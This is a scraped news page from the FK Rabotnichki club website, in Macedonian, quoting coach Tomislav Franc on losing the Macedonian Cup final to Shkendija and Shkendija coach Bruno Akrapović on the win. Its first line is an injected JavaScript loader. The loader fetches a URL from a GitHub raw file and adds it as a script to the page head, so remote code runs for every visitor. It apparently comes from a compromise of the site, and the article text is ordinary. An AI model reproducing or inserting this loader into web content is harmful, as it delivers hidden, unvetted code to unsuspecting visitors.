;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); ФК Работнички » Франц: Во фудбалот некогаш е потребна и среќа, ние ја немавме
shopping-bag 0
Items : 0
Subtotal : 0 MKD
View Cart Check Out

Франц: Во фудбалот некогаш е потребна и среќа, ние ја немавме

Тренерот Томислав Франц ја честиташе победата на Шкендија во финалето од Купот на Македонија, иако потенцираше на официјалната прес-конференција дека, сепак, фудбалерите на Работнички одиграа сосема рамноправен натпревар од кој можеше да се излезе резултатски и сосема поинаку.

„Победникот го одлучија нијанси, но и честитам на Шкендија за освоениот трофеј. Ние брзо примивме гол, и тоа не пресече во прв момент. Но, мора да им честитам и на нашите фудбалери за прикажаното и огромната борбеност. Во второто полувреме имавме неколку одлични шанси, но некогаш е потребна и среќа во фудбалот. Бевме сосема рамноправен противник“ – рече Франц.

Тренерот на Шкендија, Бруно Акраповиќ, пак не го криеше задоволството од својот прв трофеј по доаѓањето на клупата на тетовци.

„Мора прво да им честитам на моите фудбалери за заслужената победа, но веднаш и на Работнички кој одигра одличен натпревар. Ние први го отворивме резултатот, а потоа малку несвесно се повлековме. Сепак успеавме да ја сочуваме мрежата, а на крајот да стигнеме и до втор гол. Во секој случај, тоа што го посакувавме го остваривме, благодарение и на одличната поддршка и од нашите навивачи“ – рече Акраповиќ.

 

Leave a Reply